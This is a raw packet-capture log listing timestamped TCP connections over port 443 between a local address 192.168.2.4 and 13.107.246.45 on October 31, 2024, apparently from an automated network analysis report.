                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.743870974 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.746068001 CET51295443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.746294022 CET51295443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.746310949 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.360078096 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.360790014 CET51295443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.360831022 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361129045 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361291885 CET51295443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361299992 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361401081 CET51294443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361416101 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361629009 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361747980 CET51294443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361752987 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361879110 CET51293443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.361888885 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.362394094 CET51293443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.362400055 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.368352890 CET4435129113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.368721962 CET51291443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.368741989 CET4435129113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.369107962 CET51291443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.369113922 CET4435129113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.490057945 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.490267038 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.490334988 CET51295443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.490467072 CET51295443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.490493059 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.490506887 CET51295443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.490514994 CET4435129513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.492849112 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.493393898 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.493460894 CET51293443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.493510008 CET51293443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.493515968 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.493527889 CET51293443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.493532896 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.493885994 CET51296443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.493932009 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.494008064 CET51296443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.494179010 CET51296443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.494194031 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.495804071 CET51297443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.495851040 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.495923996 CET51297443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.496073008 CET51297443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.496088982 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.498157978 CET4435129113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.498397112 CET4435129113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.498491049 CET51291443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.498491049 CET51291443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.498512030 CET51291443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.498527050 CET4435129113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.500547886 CET51298443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.500566006 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.500632048 CET51298443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.500749111 CET51298443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.500761032 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.507410049 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.507472992 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.507513046 CET51294443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.507630110 CET51294443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.507630110 CET51294443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.507647991 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.507657051 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.509531021 CET51299443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.509541988 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.509617090 CET51299443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.509744883 CET51299443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.509758949 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.521615028 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.522104979 CET51292443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.522119999 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.522567034 CET51292443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.522572994 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.709908962 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.715560913 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.715620995 CET51292443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.715703011 CET51292443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.715703011 CET51292443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.715720892 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.715724945 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.719966888 CET51300443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.720005989 CET4435130013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.720087051 CET51300443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.720225096 CET51300443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:10.720242023 CET4435130013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.222820997 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.223411083 CET51296443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.223437071 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.223925114 CET51296443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.223931074 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.252053976 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.252563000 CET51298443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.252578974 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.253261089 CET51298443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.253267050 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.253546000 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.253895044 CET51299443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.253920078 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.254295111 CET51299443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.254301071 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.254760027 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.255034924 CET51297443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.255042076 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.255392075 CET51297443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.255395889 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.350976944 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.351341963 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.351454973 CET51296443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.351521015 CET51296443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.351542950 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.351553917 CET51296443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.351562023 CET4435129613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.354871988 CET51301443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.354913950 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.354995012 CET51301443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.355134010 CET51301443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.355149031 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385147095 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385442019 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385462999 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385643959 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385649920 CET51297443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385741949 CET51299443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385741949 CET51297443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385741949 CET51297443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385759115 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385768890 CET4435129713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385788918 CET51299443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385793924 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385808945 CET51299443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.385814905 CET4435129913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.386857033 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.386920929 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.386989117 CET51298443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.387562990 CET51298443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.387583017 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.387603045 CET51298443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.387609959 CET4435129813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.389347076 CET51302443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.389381886 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.389466047 CET51302443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.389652014 CET51303443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.389693022 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.389744997 CET51303443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.389930964 CET51302443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.389940977 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.390070915 CET51303443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.390089989 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.390304089 CET51304443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.390369892 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.390439987 CET51304443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.390577078 CET51304443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.390588045 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.448538065 CET4435130013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.449146986 CET51300443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.449193954 CET4435130013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.449686050 CET51300443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.449701071 CET4435130013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.580316067 CET4435130013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.580718040 CET4435130013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.580848932 CET51300443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.580908060 CET51300443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.580926895 CET4435130013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.584165096 CET51305443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.584202051 CET4435130513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.584287882 CET51305443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.584484100 CET51305443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:11.584496021 CET4435130513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.131592989 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.132272959 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.132366896 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.132520914 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.134505033 CET51303443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.134530067 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.134685993 CET51301443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.134694099 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.135292053 CET51301443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.135296106 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.135524035 CET51303443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.135528088 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.135616064 CET51302443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.135632038 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.136043072 CET51302443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.136054039 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.136431932 CET51304443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.136445045 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.136934042 CET51304443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.136940002 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.262578964 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.262739897 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.262825966 CET51302443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.262993097 CET51302443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263009071 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263020992 CET51302443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263026953 CET4435130213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263108969 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263180017 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263225079 CET51301443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263339996 CET51301443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263339996 CET51301443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263355017 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.263365030 CET4435130113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.264122963 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.264189005 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.264255047 CET51304443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.264550924 CET51304443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.264579058 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.264614105 CET51304443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.264621973 CET4435130413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.266407013 CET51306443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.266443968 CET4435130613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.266586065 CET51306443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.266736031 CET51306443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.266746044 CET4435130613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.267333984 CET51307443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.267366886 CET4435130713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.267529964 CET51307443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.267613888 CET51307443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.267625093 CET4435130713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.267848969 CET51308443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.267874956 CET4435130813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.268033028 CET51308443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.268287897 CET51308443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.268299103 CET4435130813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.355509996 CET4435130513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.356414080 CET51305443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.356432915 CET4435130513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.357146978 CET51305443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.357151985 CET4435130513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.465024948 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.465116978 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.465217113 CET51303443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.470145941 CET51303443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.470165014 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.470175028 CET51303443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.470180035 CET4435130313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.474718094 CET51309443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.474762917 CET4435130913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.474821091 CET51309443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.475033998 CET51309443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.475047112 CET4435130913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.491611004 CET4435130513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.491708040 CET4435130513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.491751909 CET51305443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.492017031 CET51305443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.492029905 CET4435130513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.492096901 CET51305443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:12.492101908 CET4435130513.107.246.45192.168.2.4
